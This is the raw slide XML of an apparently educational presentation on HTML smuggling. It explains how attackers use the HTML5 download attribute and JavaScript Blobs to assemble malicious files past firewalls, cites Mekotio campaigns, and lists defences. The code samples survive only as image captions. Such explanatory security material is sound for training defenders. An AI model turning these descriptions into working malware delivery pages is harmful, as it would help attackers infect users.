                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ResumeThread</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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4651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D40079-6283-B3CB-C48D-4254984E0315}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="347292" y="889691"/>
            <a:ext cx="11497415" cy="5078618"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>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prevent HTML smuggling attacks, organizations can implement various </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>security measures </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>such as web application firewalls, content filtering, and intrusion detection and prevention systems. </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Additionally, it is important to keep all </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>software and systems up-to-date </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>with the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>latest security patches </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>to minimize vulnerabilities that could be exploited by attackers. </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also recommended to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>educate employees on identifying and reporting suspicious emails or websites</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> that could be used to deliver malware.</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Organizations can also leverage </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>sandboxing technology </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>to isolate and analyze suspicious files, URLs, or email attachments to detect and prevent HTML smuggling attacks. </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Sandboxing allows security teams to run potentially malicious code in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>controlled environment </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>without exposing the organization's network or systems to any risks.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323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FCED-DAB5-1827-64A1-7C3A56C7B327}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="657606" y="304799"/>
            <a:ext cx="10772775" cy="938531"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>HTML smuggling overview</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="Diagram showing typical attack chain of HTML smuggling">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{208A27B7-B3E6-DBD6-1A26-EDCC133E2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89" y="1434353"/>
            <a:ext cx="8934730" cy="4733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71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9634-1EEB-7836-44BF-77072AB567F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="638174" y="313763"/>
            <a:ext cx="10772775" cy="645461"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>How HTML smuggling works</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C043B49D-1789-C78D-A89A-E0ACE9D739B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="719137" y="1174378"/>
            <a:ext cx="10753725" cy="4728994"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>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HTML smuggling uses legitimate features of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>HTML5 and JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>, which are both supported by all modern browsers, to generate malicious files behind the firewall. </a:t>
            </a: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Specifically, HTML smuggling leverages </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>the HTML5 “download” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>attribute for anchor tags and the creation and use of a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>JavaScript Blob </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>to put together the payload downloaded into an affected device.</a:t>
            </a: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 HTML5, when a user clicks a link, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>“download” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>attribute lets an HTML file automatically download a file referenced in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>” tag. </a:t>
            </a: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example, the code below instructs the browser to download “malicious.docx” from its location and save it into the device as “safe.docx”:</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Screenshot of code for download of document">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52B88F69-65F1-E3DC-09A8-0197E5BE1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421" y="5389022"/>
            <a:ext cx="6479520" cy="72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71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9634-1EEB-7836-44BF-77072AB567F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="638174" y="313763"/>
            <a:ext cx="10772775" cy="645461"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>How HTML smuggling works</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C043B49D-1789-C78D-A89A-E0ACE9D739B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="719137" y="1174378"/>
            <a:ext cx="10753725" cy="4728994"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>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anchor tag and a file’s “download” attribute also have their equivalents in JavaScript code, as seen below</a:t>
            </a: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use of JavaScript Blobs adds to the “smuggling” aspect of the technique. A JavaScript Blob stores the encoded data of a file, which is then decoded when passed to a JavaScript API that expects a URL.</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5A254D0-7DC5-D327-5565-703C56C08B86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2730732" y="2023781"/>
            <a:ext cx="6730534" cy="1158689"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3074" name="Picture 2" descr="Screenshot of code for automatic download">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C654EC34-03BB-C3B6-EA20-4BFC39A64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491" y="4474621"/>
            <a:ext cx="6545775" cy="176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563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9634-1EEB-7836-44BF-77072AB567F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="638174" y="313763"/>
            <a:ext cx="10772775" cy="645461"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Real-world examples of threats using HTML smuggling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43B49D-1789-C78D-A89A-E0ACE9D739B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="719137" y="1174378"/>
            <a:ext cx="10753725" cy="4728994"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Mekotio</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> campaigns</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">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Screenshot of email with malicious link">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E07B0D0-9E82-04A1-B1BA-4199F9EC6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695" y="1945118"/>
            <a:ext cx="4505634" cy="358610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iagram showing attack chain of Mekotio campaign using the HTML smuggling technique">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28B40A8F-F7D4-FC6A-9AAB-C8549A688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3163" y="1819612"/>
            <a:ext cx="6604999" cy="35861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5406A03-A143-01C5-5768-099A27F702C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="5829034"/>
            <a:ext cx="4688541" cy="553998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="0" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Sample email used in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Mekotio</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> campaign. Clicking the link starts the HTML smuggling technique</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"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A79C02E-9595-09A7-4403-CADE67A50DF5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7512424" y="5727703"/>
            <a:ext cx="3487270" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Threat behavior observed in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Mekotio</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> campaign</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1200" b="1"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85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9634-1EEB-7836-44BF-77072AB567F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="638174" y="313763"/>
            <a:ext cx="10772775" cy="645461"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Real-world examples of threats using HTML smuggling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43B49D-1789-C78D-A89A-E0ACE9D739B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="719137" y="853298"/>
            <a:ext cx="10753725" cy="5050074"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Mekotio</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> campaigns</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">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5406A03-A143-01C5-5768-099A27F702C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="5829034"/>
            <a:ext cx="4688541" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>  Note how the “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>” tag references a JavaScript Blob with an octet/stream type to download the malicious ZIP file.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1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A79C02E-9595-09A7-4403-CADE67A50DF5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7512424" y="5727703"/>
            <a:ext cx="3487270" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ZIP file with an obfuscated JavaScript file</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1200" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
